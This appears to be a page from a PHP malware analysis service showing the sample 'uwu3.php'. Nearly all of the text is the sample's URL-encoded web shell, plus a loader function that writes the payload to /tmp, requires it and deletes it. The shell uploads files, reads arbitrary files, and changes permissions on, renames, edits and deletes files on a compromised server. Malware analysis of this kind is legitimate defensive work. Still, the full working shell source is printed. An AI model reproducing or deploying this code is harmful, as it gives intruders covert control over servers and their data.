B%2B%29%7Becho%20%22%24paths%5B%24i%5D%22%3Bif%28%24i%21%3D%24id%29echo%20%22%2F%22%3B%7Decho%20%27%22%3E%27.%24pat.%27%3C%2Fa%3E%2F%27%3B%7Decho%20%27%0A%09%09%09%09%09%3C%2Ftd%3E%0A%09%09%09%09%3C%2Ftr%3E%0A%0A%09%09%09%09%3Ctr%3E%0A%09%09%09%09%09%3Ctd%3E%27%3Bif%28isset%28%24_FILES%5B%27file%27%5D%29%29%7Bif%28copy%28%24_FILES%5B%27file%27%5D%5B%27tmp_name%27%5D%2C%24path.%27%2F%27.%24_FILES%5B%27file%27%5D%5B%27name%27%5D%29%29%7Becho%20%27%0A%09%09%09%09%09%09%3Cscript%3Ealert%28%22OK%22%29%3B%3C%2Fscript%3E%0A%09%09%09%09%09%09%0A%09%09%09%09%09%09%3Cbr%3E%0A%09%09%09%09%09%09%27%3B%7Delse%7Becho%20%27%0A%09%09%09%09%09%09%3Cscript%3Ealert%28%22FAIL%22%29%3B%3C%2Fscript%3E%0A%09%09%09%09%09%09%0A%09%09%09%09%09%09%3Cbr%3E%0A%09%09%09%09%09%09%27%3B%7D%7D%3F%3E%0A%0A%09%09%09%09%09%09%3Cform%20enctype%3D%22multipart%2Fform-data%22%20method%3D%22POST%22%3E%0A%09%09%09%09%09%09%09%3Cinput%20type%3D%22file%22%20name%3D%22file%22%20%2F%3E%0A%09%09%09%09%09%09%09%3Cinput%20type%3D%22submit%22%20value%3D%22%3E%3E%22%20%2F%3E%0A%09%09%09%09%09%09%3C%2Fform%3E%0A%09%09%09%09%09%3C%2Ftd%3E%0A%09%09%09%09%3C%2Ftr%3E%0A%3C%3Fphp%0A%20if%28isset%28%24_GET%5B%27filesrc%27%5D%29%29%7Becho%20%22%09%09%09%09%3Ctr%3E%0A%09%09%09%09%09%3Ctd%3E%0A%09%09%09%09%09%0A%09%09%09%09%09%3Cbr%3E%0A%09%09%09%09%09%0A%09%09%09%09%09%3Ccenter%3E%0A%09%09%09%09%09%22%3Becho%20%22%3Cfont%20color%3D%5C%22%2300FF66%20%5C%22%3E%22.%24_GET%5B%27filesrc%27%5D.%22%3C%2Ffont%3E%22%3Becho%20%27%0A%09%09%09%09%09%3C%2Fcenter%3E%0A%09%09%09%09%09%3C%2Ftd%3E%0A%09%09%09%09%3C%2Ftr%3E%0A%09%09%09%3C%2Ftable%3E%0A%09%09%09%0A%09%09%09%3Cbr%3E%27%3Becho%28%27%0A%09%09%09%0A%09%09%09%3Cpre%3E%0A%27.htmlspecialchars%28file_get_contents%28%24_GET%5B%27filesrc%27%5D%29%29.%27%09%09%09%0A%09%09%09%3C%2Fpre%3E%27%29%3B%7Delseif%28isset%28%24_GET%5B%27option%27%5D%29%26%26%24_POST%5B%27opt%27%5D%21%3D%27delete%27%29%7Becho%20%27%09%09%09%09%3C%2Ftable%3E%0A%09%09%20%0A%09%09%09%09%3Cbr%3E%0A%09%09%20%0A%09%09%09%09%3Ccenter%3E%27.%24_POST%5B%27path%27%5D.%27%0A%09%09%09%09%0A%09%09%09%09%3Cbr%3E%0A%09%09%09%09%3Cbr%3E%27%3Bif%28%24_POST%5B%27opt%27%5D%3D%3D%27chmod%27%29%7Bif%28isset%28%24_POST%5B%27perm%27%5D%29%29%7Bif%28chmod%28%24_POST%5B%27path%27%5D%2C%24_POST%5B%27perm%27%5D%29%29%7Becho%20%27%0A%09%09%09%09%09%0A%09%09%09%09%3Cscript%3Ealert%28%22OK%22%29%3B%3C%2Fscript%3E%0A%09%09%09%09%0A%09%09%09%09%3Cbr%3E%27%3B%7Delse%7Becho%20%27%0A%09%09%09%09%09%0A%09%09%09%09%3Cscript%3Ealert%28%22FAIL%22%29%3B%3C%2Fscript%3E%0A%09%09%09%09%0A%09%09%09%09%3Cbr%3E%27%3B%7D%7D%3F%3E%0A%0A%0A%09%09%09%09%3Cform%20method%3D%22POST%22%3E%0A%09%09%09%09%09Permission%20%3A%20%0A%09%09%09%09%09%3Cinput%20name%3D%22perm%22%20type%3D%22text%22%20size%3D%224%22%20value%3D%22%3C%3Fphp%20echo%20substr%28sprintf%28%27%25o%27%2Cfileperms%28%24_POST%5B%27path%27%5D%29%29%2C-4%29%3B%3F%3E%22%20%2F%3E%0A%09%09%09%09%09%3Cinput%20type%3D%22hidden%22%20name%3D%22path%22%20value%3D%22%3C%3Fphp%20echo%20%24_POST%5B%27path%27%5D%3B%3F%3E%22%3E%0A%09%09%09%09%09%3Cinput%20type%3D%22hidden%22%20name%3D%22opt%22%20value%3D%22chmod%22%3E%0A%09%09%09%09%09%3Cinput%20type%3D%22submit%22%20value%3D%22%3E%3E%22%20%2F%3E%0A%09%09%09%09%3C%2Fform%3E%0A%3C%3Fphp%0A%20%7Delseif%28%24_POST%5B%27opt%27%5D%3D%3D%27rename%27%29%7Bif%28isset%28%24_POST%5B%27newname%27%5D%29%29%7Bif%28rename%28%24_POST%5B%27path%27%5D%2C%24path.%27%2F%27.%24_POST%5B%27newname%27%5D%29%29%7Becho%20%27%0A%09%09%09%09%09%0A%09%09%09%09%3Cscript%3Ealert%28%22OK%22%29%3B%3C%2Fscript%3E%0A%09%09%09%09%0A%09%09%09%09%3Cbr%3E%27%3B%7Delse%7Becho%20%27%0A%09%09%09%09%09%0A%09%09%09%09%3Cscript%3Ealert%28%22FAIL%22%29%3B%3C%2Fscript%3E%0A%09%09%09%09%0A%09%09%09%09%3Cbr%3E%27%3B%7D%24_POST%5B%27name%27%5D%3D%24_POST%5B%27newname%27%5D%3B%7D%3F%3E%0A%0A%0A%09%09%09%09%3Cform%20method%3D%22POST%22%3E%0A%09%09%09%09%09New%20Name%20%3A%20%0A%09%09%09%09%09%3Cinput%20name%3D%22newname%22%20type%3D%22text%22%20size%3D%2220%22%20value%3D%22%3C%3Fphp%20echo%20%24_POST%5B%27name%27%5D%3B%3F%3E%22%20%2F%3E%0A%09%09%09%09%09%3Cinput%20type%3D%22hidden%22%20name%3D%22path%22%20value%3D%22%3C%3Fphp%20echo%20%24_POST%5B%27path%27%5D%3B%3F%3E%22%3E%0A%09%09%09%09%09%3Cinput%20type%3D%22hidden%22%20name%3D%22opt%22%20value%3D%22rename%22%3E%0A%09%09%09%09%09%3Cinput%20type%3D%22submit%22%20value%3D%22%3E%3E%22%20%2F%3E%0A%09%09%09%09%3C%2Fform%3E%0A%3C%3Fphp%0A%20%7Delseif%28%24_POST%5B%27opt%27%5D%3D%3D%27edit%27%29%7Bif%28isset%28%24_POST%5B%27src%27%5D%29%29%7B%24fp%3Dfopen%28%24_POST%5B%27path%27%5D%2C%27w%27%29%3Bif%28fwrite%28%24fp%2C%24_POST%5B%27src%27%5D%29%29%7Becho%20%27%0A%09%09%09%09%09%0A%09%09%09%09%3Cscript%3Ealert%28%22OK%22%29%3B%3C%2Fscript%3E%0A%09%09%09%09%0A%09%09%09%09%3Cbr%3E%27%3B%7Delse%7Becho%20%27%0A%09%09%09%09%09%0A%09%09%09%09%3Cscript%3Ealert%28%22FAIL%22%29%3B%3C%2Fscript%3E%0A%09%09%09%09%0A%09%09%09%09%3Cbr%3E%27%3B%7Dfclose%28%24fp%29%3B%7D%3F%3E%0A%0A%0A%09%09%09%09%3Cform%20method%3D%22POST%22%3E%0A%09%09%09%09%0A%09%09%09%09%09%3Ctextarea%20cols%3D80%20rows%3D20%20name%3D%22src%22%3E%0A%3C%3Fphp%20echo%20htmlspecialchars%28file_get_contents%28%24_POST%5B%27path%27%5D%29%29%3B%3F%3E%0A%3C%2Ftextarea%3E%0A%09%09%09%09%09%0A%09%09%09%09%09%3Cbr%3E%0A%09%09%09%09%09%0A%09%09%09%09%09%3Cinput%20type%3D%22hidden%22%20name%3D%22path%22%20value%3D%22%3C%3Fphp%20echo%20%24_POST%5B%27path%27%5D%3B%3F%3E%22%3E%0A%09%09%09%09%09%3Cinput%20type%3D%22hidden%22%20name%3D%22opt%22%20value%3D%22edit%22%3E%0A%09%09%09%09%09%3Cinput%20type%3D%22submit%22%20value%3D%22%3E%3E%22%20%2F%3E%0A%09%09%09%09%3C%2Fform%3E%0A%3C%3Fphp%0A%20%7Decho%20%27%09%09%09%09%3C%2Fcenter%3E%27%3B%7Delse%7Becho%20%27%09%09%09%20%3C%2Ftable%3E%0A%09%09%20%0A%09%09%09%20%3Cbr%3E%0A%09%09%20%0A%09%09%09%20%3Ccenter%3E%27%3Bif%28isset%28%24_GET%5B%27option%27%5D%29%26%26%24_POST%5B%27opt%27%5D%3D%3D%27delete%27%29%7Bif%28%24_POST%5B%27type%27%5D%3D%3D%27dir%27%29%7Bif%28rmdir%28%24_POST%5B%27path%27%5D%29%29%7Becho%20%27%0A%09%09%09%09%09%0A%09%09%09%09%3Cscript%3Ealert%28%22OK%22%29%3B%3C%2Fscript%3E%0A%09%09%09%09%0A%09%09%09%09%3Cbr%3E%27%3B%7Delse%7Becho%20%27%0A%09%09%09%09%09%0A%09%09%09%09%3Cscript%3Ealert%28%22FAIL%22%29%3B%3C%2Fscript%3E%0A%09%09%09%09%0A%09%09%09%09%3Cbr%3E%27%3B%7D%7Delseif%28%24_POST%5B%27type%27%5D%3D%3D%27file%27%29%7Bif%28unlink%28%24_POST%5B%27path%27%5D%29%29%7Becho%20%27%0A%09%09%09%09%09%0A%09%09%09%09%3Cscript%3Ealert%28%22OK%22%29%3B%3C%2Fscript%3E%0A%09%09%09%09%0A%09%09%09%09%3Cbr%3E%27%3B%7Delse%7Becho%20%27%0A%09%09%09%09%09%0A%09%09%09%09%3Cscript%3Ealert%28%22FAIL%22%29%3B%3C%2Fscript%3E%0A%09%09%09%09%0A%09%09%09%09%3Cbr%3E%27%3B%7D%7D%7Decho%20%27%3C%2Fcenter%3E%27%3B%24scandir%3Dscandir%28%24path%29%3B%3F%3E%0A%0A%0A%09%09%09%20%3Cdiv%20id%3D%22content%22%3E%0A%09%09%09%09%3Ctable%20width%3D%22700%22%20border%3D%220%22%20cellpadding%3D%223%22%20cellspacing%3D%221%22%20align%3D%22center%22%3E%0A%09%09%09%09%09%3Ctr%20class%3D%22first%22%3E%0A%09%09%09%09%09%09%3Ctd%3E%0A%09%09%09%09%09%09%09%3Ccenter%3EName%3C%2Fcenter%3E%0A%09%09%09%09%09%09%3C%2Ftd%3E%0A%09%09%09%09%09%09%3Ctd%3E%0A%09%09%09%09%09%09%09%3Ccenter%3ESize%3C%2Fcenter%3E%0A%09%09%09%09%09%09%3C%2Ftd%3E%0A%09%09%09%09%09%09%3Ctd%3E%0A%09%09%09%09%09%09%09%3Ccenter%3EPermissions%3C%2Fcenter%3E%0A%09%09%09%09%09%09%3C%2Ftd%3E%0A%09%09%09%09%09%09%3Ctd%3E%0A%09%09%09%09%09%09%09%3Ccenter%3EOptions%3C%2Fcenter%3E%0A%09%09%09%09%09%09%3C%2Ftd%3E%0A%09%09%09%09%09%3C%2Ftr%3E%0A%09%09%09%09%09%0A%3C%3Fphp%0A%20foreach%28%24scandir%20as%20%24dir%29%7Bif%28%21is_dir%28%22%24path%2F%24dir%22%29%7C%7C%24dir%3D%3D%27.%27%7C%7C%24dir%3D%3D%27..%27%29continue%3Becho%20%22%09%09%09%09%09%0A%09%09%09%09%09%3Ctr%3E%0A%09%09%09%09%09%09%3Ctd%3E%0A%09%09%09%09%09%09%09%3Ca%20class%3D%5C%22wrn%5C%22%20href%3D%5C%22%3Fpath%3D%24path%2F%24dir%5C%22%3E%24dir%3C%2Fa%3E%0A%09%09%09%09%09%09%3C%2Ftd%3E%09%09%09%09%09%09%09%09%0A%09%09%09%09%09%09%3Ctd%3E%0A%09%09%09%09%09%09%09%3Ccenter%3E--%3C%2Fcenter%3E%0A%09%09%09%09%09%09%3C%2Ftd%3E%09%09%09%09%09%09%0A%09%09%09%09%09%09%3Ctd%3E%0A%09%09%09%09%09%09%09%3Ccenter%3E%22%3Bif%28is_writable%28%22%24path%2F%24dir%22%29%29echo%20%27%3Cfont%20color%3D%22%2300BB00%22%3E%27%3Belseif%28%21is_readable%28%22%24path%2F%24dir%22%29%29echo%20%27%3Cfont%20color%3D%22red%22%3E%27%3Becho%20perms%28%22%24path%2F%24dir%22%29%3Bif%28is_writable%28%22%24path%2F%24dir%22%29%7C%7C%21is_readable%28%22%24path%2F%24dir%22%29%29echo%20%27%3C%2Ffont%3E%27%3Becho%20%22%3C%2Fcenter%3E%0A%09%09%09%09%09%09%3C%2Ftd%3E%0A%09%09%09%09%09%09%3Ctd%3E%0A%09%09%09%09%09%09%09%3Ccenter%3E%0A%09%09%09%09%09%09%09%09%3Cform%20method%3D%5C%22POST%5C%22%20action%3D%5C%22%3Foption%26path%3D%24path%5C%22%3E%0A%09%09%09%09%09%09%09%09%0A%09%09%09%09%09%09%09%09%09%3Cselect%20name%3D%5C%22opt%5C%22%3E%0A%09%09%09%09%09%09%09%09%09%09%3Coption%20value%3D%5C%22%5C%22%3E%3C%2Foption%3E%0A%09%09%09%09%09%09%09%09%09%09%3Coption%20value%3D%5C%22delete%5C%22%3EDelete%3C%2Foption%3E%0A%09%09%09%09%09%09%09%09%09%09%3Coption%20value%3D%5C%22chmod%5C%22%3EChmod%3C%2Foption%3E%0A%09%09%09%09%09%09%09%09%09%09%3Coption%20value%3D%5C%22rename%5C%22%3ERename%3C%2Foption%3E%0A%09%09%09%09%09%09%09%09%09%3C%2Fselect%3E%0A%09%09%09%09%09%09%09%09%09%0A%09%09%09%09%09%09%09%09%09%3Cinput%20type%3D%5C%22hidden%5C%22%20name%3D%5C%22type%5C%22%20value%3D%5C%22dir%5C%22%3E%0A%09%09%09%09%09%09%09%09%09%3Cinput%20type%3D%5C%22hidden%5C%22%20name%3D%5C%22name%5C%22%20value%3D%5C%22%24dir%5C%22%3E%0A%09%09%09%09%09%09%09%09%09%3Cinput%20type%3D%5C%22hidden%5C%22%20name%3D%5C%22path%5C%22%20value%3D%5C%22%24path%2F%24dir%5C%22%3E%0A%09%09%09%09%09%09%09%09%09%3Cinput%20type%3D%5C%22submit%5C%22%20value%3D%5C%22%3E%3E%5C%22%20%2F%3E%0A%09%09%09%09%09%09%09%09%3C%2Fform%3E%0A%09%09%09%09%09%09%09%3C%2Fcenter%3E%0A%09%09%09%09%09%09%3C%2Ftd%3E%0A%09%09%09%09%09%3C%2Ftr%3E%22%3B%7D%3F%3E%0A%0A%09%09%09%09%09%3Ctr%20class%3D%22first%22%3E%0A%09%09%09%09%09%09%3Ctd%3E%3C%2Ftd%3E%0A%09%09%09%09%09%09%3Ctd%3E%3C%2Ftd%3E%0A%09%09%09%09%09%09%3Ctd%3E%3C%2Ftd%3E%0A%09%09%09%09%09%09%3Ctd%3E%3C%2Ftd%3E%0A%09%09%09%09%09%3C%2Ftr%3E%0A%3C%3Fphp%0A%20foreach%28%24scandir%20as%20%24file%29%7Bif%28%21is_file%28%22%24path%2F%24file%22%29%29continue%3B%24size%3Dfilesize%28%22%24path%2F%24file%22%29%2F1024%3B%24size%3Dround%28%24size%2C3%29%3Bif%28%24size%3E%3D1024%29%7B%24size%3Dround%28%24size%2F1024%2C2%29.%27%20MB%27%3B%7Delse%7B%24size%3D%24size.%27%20KB%27%3B%7Decho%20%22%09%09%09%09%09%3Ctr%3E%0A%09%09%09%09%09%09%3Ctd%3E%0A%09%09%09%09%09%09%09%3Ca%20class%3D%5C%22wrn%5C%22%20href%3D%5C%22%3Ffilesrc%3D%24path%2F%24file%26path%3D%24path%5C%22%3E%24file%3C%2Fa%3E%0A%09%09%09%09%09%09%3C%2Ftd%3E%0A%09%09%09%09%09%09%0A%09%09%09%09%09%09%3Ctd%3E%0A%09%09%09%09%09%09%09%3Ccenter%3E%22.%24size.%22%3C%2Fcenter%3E%0A%09%09%09%09%09%09%3C%2Ftd%3E%0A%09%09%09%09%09%09%3Ctd%3E%0A%09%09%09%09%09%09%09%3Ccenter%3E%22%3Bif%28is_writable%28%22%24path%2F%24file%22%29%29echo%20%27%0A%09%09%09%09%09%09%09%09%3Cfont%20color%3D%22%2300BB00%22%3E%27%3Belseif%28%21is_readable%28%22%24path%2F%24file%22%29%29echo%20%27%0A%09%09%09%09%09%09%09%09%3Cfont%20color%3D%22red%22%3E%27%3Becho%20perms%28%22%24path%2F%24file%22%29%3Bif%28is_writable%28%22%24path%2F%24file%22%29%7C%7C%21is_readable%28%22%24path%2F%24file%22%29%29echo%20%27%3C%2Ffont%3E%27%3Becho%20%22%0A%09%09%09%09%09%09%09%3C%2Fcenter%3E%0A%09%09%09%09%09%09%3C%2Ftd%3E%0A%09%09%09%09%09%09%3Ctd%3E%0A%09%09%09%09%09%09%09%3Ccenter%3E%0A%09%09%09%09%09%09%09%09%3Cform%20method%3D%5C%22POST%5C%22%20action%3D%5C%22%3Foption%26path%3D%24path%5C%22%3E%0A%09%09%09%09%09%09%09%09%0A%09%09%09%09%09%09%09%09%09%3Cselect%20name%3D%5C%22opt%5C%22%3E%0A%09%09%09%09%09%09%09%09%09%09%3Coption%20value%3D%5C%22%5C%22%3E%3C%2Foption%3E%0A%09%09%09%09%09%09%09%09%09%09%3Coption%20value%3D%5C%22delete%5C%22%3EDelete%3C%2Foption%3E%0A%09%09%09%09%09%09%09%09%09%09%3Coption%20value%3D%5C%22chmod%5C%22%3EChmod%3C%2Foption%3E%0A%09%09%09%09%09%09%09%09%09%09%3Coption%20value%3D%5C%22rename%5C%22%3ERename%3C%2Foption%3E%0A%09%09%09%09%09%09%09%09%09%09%3Coption%20value%3D%5C%22edit%5C%22%3EEdit%3C%2Foption%3E%0A%09%09%09%09%09%09%09%09%09%3C%2Fselect%3E%0A%09%09%09%09%09%09%09%09%09%0A%09%09%09%09%09%09%09%09%09%3Cinput%20type%3D%5C%22hidden%5C%22%20name%3D%5C%22type%5C%22%20value%3D%5C%22file%5C%22%3E%0A%09%09%09%09%09%09%09%09%09%3Cinput%20type%3D%5C%22hidden%5C%22%20name%3D%5C%22name%5C%22%20value%3D%5C%22%24file%5C%22%3E%0A%09%09%09%09%09%09%09%09%09%3Cinput%20type%3D%5C%22hidden%5C%22%20name%3D%5C%22path%5C%22%20value%3D%5C%22%24path%2F%24file%5C%22%3E%0A%09%09%09%09%09%09%09%09%09%3Cinput%20type%3D%5C%22submit%5C%22%20value%3D%5C%22%3E%3E%5C%22%20%2F%3E%0A%09%09%09%09%09%09%09%09%3C%2Fform%3E%0A%09%09%09%09%09%09%09%3C%2Fcenter%3E%0A%09%09%09%09%09%09%3C%2Ftd%3E%0A%09%09%09%09%09%3C%2Ftr%3E%22%3B%7Decho%20%27%0A%09%09%09%09%3C%2Ftable%3E%0A%09%09%09%3C%2Fdiv%3E%27%3B%7D%3F%3E%0A%0A%0A%09%09%09%3Cbr%3E%0A%09%09%09%0A%09%09%09%3Cdiv%20class%3D%22footer%22%3EHit%20me%20%5Bat%5D%20%3Cfont%20color%3D%22red%22%3Esgtsans%XMR%0A%20function%20perms%28%24file%29%7B%24perms%3Dfileperms%28%24file%29%3Bif%28%28%24perms%260xC000%29%3D%3D0xC000%29%7B%24info%3D%27s%27%3B%7Delseif%28%28%24perms%260xA000%29%3D%3D0xA000%29%7B%24info%3D%27l%27%3B%7Delseif%28%28%24perms%260x8000%29%3D%3D0x8000%29%7B%24info%3D%27-%27%3B%7Delseif%28%28%24perms%260x6000%29%3D%3D0x6000%29%7B%24info%3D%27b%27%3B%7Delseif%28%28%24perms%260x4000%29%3D%3D0x4000%29%7B%24info%3D%27d%27%3B%7Delseif%28%28%24perms%260x2000%29%3D%3D0x2000%29%7B%24info%3D%27c%27%3B%7Delseif%28%28%24perms%260x1000%29%3D%3D0x1000%29%7B%24info%3D%27p%27%3B%7Delse%20%7B%24info%3D%27u%27%3B%7D%24info.%3D%28%28%24perms%260x0100%29%3F%27r%27%3A%27-%27%29%3B%24info.%3D%28%28%24perms%260x0080%29%3F%27w%27%3A%27-%27%29%3B%24info.%3D%28%28%24perms%260x0040%29%3F%28%28%24perms%260x0800%29%3F%27s%27%3A%27x%27%29%3A%28%28%24perms%260x0800%29%3F%27S%27%3A%27-%27%29%29%3B%24info.%3D%28%28%24perms%260x0020%29%3F%27r%27%3A%27-%27%29%3B%24info.%3D%28%28%24perms%260x0010%29%3F%27w%27%3A%27-%27%29%3B%24info.%3D%28%28%24perms%260x0008%29%3F%28%28%24perms%260x0400%29%3F%27s%27%3A%27x%27%29%3A%28%28%24perms%260x0400%29%3F%27S%27%3A%27-%27%29%29%3B%24info.%3D%28%28%24perms%260x0004%29%3F%27r%27%3A%27-%27%29%3B%24info.%3D%28%28%24perms%260x0002%29%3F%27w%27%3A%27-%27%29%3B%24info.%3D%28%28%24perms%260x0001%29%3F%28%28%24perms%260x0200%29%3F%27t%27%3A%27x%27%29%3A%28%28%24perms%260x0200%29%3F%27T%27%3A%27-%27%29%29%3Breturn%20%24info%3B%7D%3F%3E");

   function x($i)
   {
       $t = tempnam("/tmp", "0");
       $h = fopen($t, "w+");
       fwrite($h, $i);
       fclose($h);
       require $t;
       unlink($t);
       return get_defined_vars();
   }
   extract(x($i));
?>
PHP Malware Analysis

uwu3.php

md5: 3322901904b1f4aa0260179dc705e561

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
